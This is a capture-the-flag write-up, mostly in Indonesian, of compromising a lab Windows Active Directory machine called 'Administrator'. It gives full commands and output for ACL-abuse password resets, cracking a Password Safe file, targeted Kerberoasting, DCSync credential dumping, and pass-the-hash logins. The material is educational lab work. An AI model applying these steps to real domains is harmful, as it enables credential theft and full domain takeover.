ADMINISTRATOR
ADMINISTRATOR
Embedded Files
Administrator is an Medium difficulty Windows machine.
Machine Information
As is common in real life Windows pentests, you will start the Administrator box with credentials for the following account: Username: Olivia Password: ichliebedich
┌──(glmx㉿kali)-[~]
└─$ nmap -sC -sV 10.10.11.42 -T4 -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-28 02:17 WIB
Nmap scan report for 10.10.11.42
Host is up (0.067s latency).
Not shown: 988 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-28 02:02:44Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 6h45m03s
| smb2-time:
| date: 2024-12-28T02:02:52
|_ start_date: N/A
Mencoba masuk ke ftp sebagai anonymous dan kredensial yang diberikan untuk mesin ini, tetapi gagal
┌──(glmx㉿kali)-[~]
└─$ ftp 10.10.11.42
Connected to 10.10.11.42.
220 Microsoft FTP Service
Name (10.10.11.42:glmx): anonymous
331 Password required
Password:
530 User cannot log in.
ftp: Login failed
┌──(glmx㉿kali)-[~]
└─$ ftp 10.10.11.42
Connected to 10.10.11.42.
220 Microsoft FTP Service
Name (10.10.11.42:glmx): olivia
331 Password required
Password:
530 User cannot log in, home directory inaccessible.
ftp: Login failed
┌──(glmx㉿kali)-[~]
└─$ sudo netexec smb 10.10.11.42 -u 'olivia' -p 'ichliebedich' --shares
SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.42 445 DC [+] administrator.htb\olivia:ichliebedich
SMB 10.10.11.42 445 DC [+] Enumerated shares
SMB 10.10.11.42 445 DC Share Permissions Remark
SMB 10.10.11.42 445 DC ----- ----------- ------
SMB 10.10.11.42 445 DC ADMIN$ Remote Admin
SMB 10.10.11.42 445 DC C$ Default share
SMB 10.10.11.42 445 DC IPC$ READ Remote IPC
SMB 10.10.11.42 445 DC NETLOGON READ Logon server share
SMB 10.10.11.42 445 DC SYSVOL READ Logon server share
┌──(glmx㉿kali)-[~]
└─$ sudo netexec winrm 10.10.11.42 -u 'olivia' -p 'ichliebedich'
SMB 10.10.11.42 5985 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)
HTTP 10.10.11.42 5985 DC [*] http://10.10.11.42:5985/wsman
WINRM 10.10.11.42 5985 DC [+] administrator.htb\olivia:ichliebedich (Pwn3d!)
┌──(glmx㉿kali)-[~]
└─$ evil-winrm -i 10.10.11.42 -u 'olivia' -p 'ichliebedich'
*Evil-WinRM* PS C:\Users\olivia\Documents> ls
Directory: C:\Users\olivia\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/27/2024 3:15 PM 795 revshell.ps1
*Evil-WinRM* PS C:\Users\olivia\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
==================== ============================================
administrator\olivia S-1-5-21-1088858960-373806567-254189436-1108
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\olivia\Documents> net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator alexander benjamin
emily emma ethan
Guest krbtgt michael
olivia
The command completed with one or more errors.
Melakukan enumerasi Active Directory menggunakan kredensial olivia, serta mengumpulkan informasi tentang hak akses, hubungan antar pengguna, grup, dan objek di dalam AD. Informasi yang dikumpulkan kemudian akan digunakan untuk analisis lebih lanjut dalam BloodHound untuk menemukan jalur ekskalasi hak istimewa (privilege escalation) atau potensi kelemahan di Active Directory.
┌──(glmx㉿kali)-[~]
└─$ netexec ldap 10.10.11.42 -u olivia -p ichliebedich --bloodhound --collection All --dns-server 10.10.11.42
SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.42 389 DC [+] administrator.htb\olivia:ichliebedich
LDAP 10.10.11.42 389 DC Resolved collection methods: psremote, objectprops, group, session, rdp, trusts, localadmin, dcom, acl, container
LDAP 10.10.11.42 389 DC Done in 00M 12S
LDAP 10.10.11.42 389 DC Compressing output into /home/glmx/.nxc/logs/DC_10.10.11.42_2024-12-28_114533_bloodhound.zip
upload "DC_10.10.11.42_2024-12-28_114533_bloodhound.zip" ke bloodhound -> search user olivia.
User Olivia memiliki First Degree Object Control (FDOC) GenericAll ke user Michael. Artinya, diberikan akses penuh ke user olivia atas user michael.
Dengan hak tersebut, kata sandi michael dapat diganti melalui user olivia menggunakan net user
*Evil-WinRM* PS C:\Users\olivia\Documents> net user michael <mike_pass>/domain
The command completed successfully.
cek hasil penggantian password user michael:
┌──(glmx㉿kali)-[~]
└─$ sudo netexec smb 10.10.11.42 -u 'michael' -p '<mike_pass>'
SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.42 445 DC [+] administrator.htb\michael:<mike_pass>
Sedangkan user Michael memiliki FDOC ForceChangePassword ke user Benjamin. Berarti dapat mengganti kata sandi user benjamin melalui user michael.
rpcclient: Dapat mengelola sistem Windows dari jarak jauh melalui protokol SMB atau RPC.
setuserinfo2: berfungsi untuk memperbarui informasi akun pengguna, seperti nama, deskripsi, atau pengaturan lain, pada sistem Windows atau Active Directory.
*tetapi memerlukan hak administratif (hak ini telah dimiliki oleh user michael atas user benjamin)
┌──(glmx㉿kali)-[~]
└─$ rpcclient -U michael 10.10.11.42
Password for [WORKGROUP\michael]:
rpcclient $> setuserinfo2 benjamin 23 '<benja_pass>'
rpcclient $> exit
┌──(glmx㉿kali)-[~]
└─$ netexec smb 10.10.11.42 -u 'benjamin' -p '<benja_pass>'
SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.42 445 DC [+] administrator.htb\benjamin:<benja_pass>
Sekarang mencoba gunakan kredensial benjamin untuk login ke FTP. Berhasil masuk dan menemukan file psafe3. Kemudian mendownloadnya ke perangkat.
┌──(glmx㉿kali)-[~]
└─$ ftp 10.10.11.42
Connected to 10.10.11.42.
220 Microsoft FTP Service
Name (10.10.11.42:glmx): benjamin
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp>
ftp> dir
229 Entering Extended Passive Mode (|||56318|)
125 Data connection already open; Transfer starting.
10-05-24 08:13AM 952 Backup.psafe3
226 Transfer complete.
ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||56321|)
125 Data connection already open; Transfer starting.
100% |****************************************************************************************************************| 952 12.07 KiB/s 00:00 ETA
226 Transfer complete.
WARNING! 3 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
952 bytes received in 00:00 (7.26 KiB/s)
ftp>
Apa itu p3safe ?
https://www.pwsafe.org
Untuk melihat kata sandi dari file tersebut agar bisa di akses pada Password Safe, akan dicari tahu lebih dahulu kata sandinya menggunakan Hashcat. (Hashcat saya menggunakan sistem operasi windows untuk menjalankannya.
9000: Password Safe v2
5200: Password Safe v3
PS C:\Users\gmt94\Desktop\hashcat-6.2.6> .\hashcat.exe -m 5200 C:\Users\gmt94\Desktop\Backup.psafe3 .\rockyou.txt
C:\Users\gmt94\Desktop\Backup.psafe3:te*****o
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5200 (Password Safe v3)
Hash.Target......: C:\Users\gmt94\Desktop\Backup.psafe3
Time.Started.....: Sat Dec 28 12:47:21 2024 (2 secs)
Time.Estimated...: Sat Dec 28 12:47:23 2024 (0 secs)
Kernel.Feature...: Pure Kernel
...
Setelah dibuka, terdapat 3 kredensial milik user emma, alexander, dan emily.
Dari hasil bloodhound, hanya emily yang memiliki FDOC yang mengizinkan GenericWrite dengan Ethan.
Menariknya lagi, FDOC Ethan memiliki DCSync pada Domain Controller. Dengan DCSync, dump semua password pada domain controller menjadi memungkinkan.
Sebelum kesana, dapatkan dahulu cara masuk ke user Ethan..
emily cred: UXLCI5*******
verifikasi password emily:
┌──(glmx㉿kali)-[~]
└─$ netexec smb 10.10.11.42 -u emily -p UXLCI5***
SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.42 445 DC [+] administrator.htb\emily:UXLCI5***
┌──(glmx㉿kali)-[~]
└─$ netexec winrm 10.10.11.42 -u emily -p UXLCI5***
WINRM 10.10.11.42 5985 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)
WINRM 10.10.11.42 5985 DC [+] administrator.htb\emily:UXLCI5*** (Pwn3d!)
Kerberoasting
Kerberoasting adalah teknik serangan yang mengeksploitasi fitur Kerberos di Active Directory. Penyerang memanfaatkan akun dengan SPN (Service Principal Name) untuk meminta tiket layanan Kerberos (TGS - Ticket Granting Service). Tiket ini berisi hash kata sandi akun. Kemudian hash tersebut di-crack secara offline untuk mendapatkan kredensial. Tetapi syaratnya adalah target harus memiliki SPN yang terdaftar.
Dalam Kasus ini, user target (ethan) tidak memiliki SPN maka akan dimanipulasi menggunakan user Emily yang memiliki hak GenericWrite untuk membuat SPN, request tiket, dan crack hash untuk mendapatkan kata sandi.
Saat memulai, mengalami kegagalan karena waktu mesin target dan mesin saya berbeda waktunya 😂
ERROR: [!] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
Masalah teratasi 😁
Lanjutkan..
cek date:
*Evil-WinRM* PS C:\Users\emily\Documents> Get-Date
Saturday, December 28, 2024 5:20:27 AM
┌──(glmx㉿kali)-[~]
└─$ date +"%I:%M:%S %p %d-%m-%Y"
01:35:31 PM 28-12-2024
change date:
┌──(glmx㉿kali)-[~]
└─$ sudo timedatectl set-ntp off
┌──(glmx㉿kali)-[~]
└─$ sudo rdate -n 10.10.11.42
Sat Dec 28 20:22:37 WIB 2024
Setelah selesai disesuaikan waktunya, mulai kembali kerberostingnya:
└─$ ./targetedKerberoast.py -d administrator.htb -u emily -p UXLCI5***
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$e45ae302babcc****
(Mendapatkan krb5t hash)
Melakukan cracking hash menggunakan hashcat.
Berhasil crack tiket Kerberos TGS (Ticket Granting Service) dengan menggunakan enkripsi etype 23, yang berarti ini adalah Kerberos 5 TGS-REP dengan AES256.
PS C:\Users\gmt94\Desktop\hashcat-6.2.6> .\hashcat.exe -m 13100 -O .\ethan_krb5t .\rockyou.txt
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$e45ae302babc**************
8dcec879a314e16e812332f13e:<password>
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator....32f13e
Time.Started.....: Sat Dec 28 13:47:37 2024 (0 secs)
Time.Estimated...: Sat Dec 28 13:47:37 2024 (0 secs)
Kernel.Feature...: Optimized Kernel
Guess.Base.......: File (.\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
....
Seperti yang dibahas sebelumnya atas penemuan terkait user Ethan, bahwa user ini memiliki DSync. Memungkinkan untuk dump password di dalam domain controller.
┌──(glmx㉿kali)-[~/TOOLS/targetedKerberoast]
└─$ impacket-secretsdump administrator.htb/ethan:<ethan_pass>@10.10.11.42
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:a*****e:3*******e:::
...
┌──(glmx㉿kali)-[~/TOOLS/targetedKerberoast]
└─$ evil-winrm -i 10.10.11.42 -u 'Administrator' -H '3***e'
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
administrator\administrator
Berhasil mendapatkan user & root flag ^_^
Google Sites
Report abuse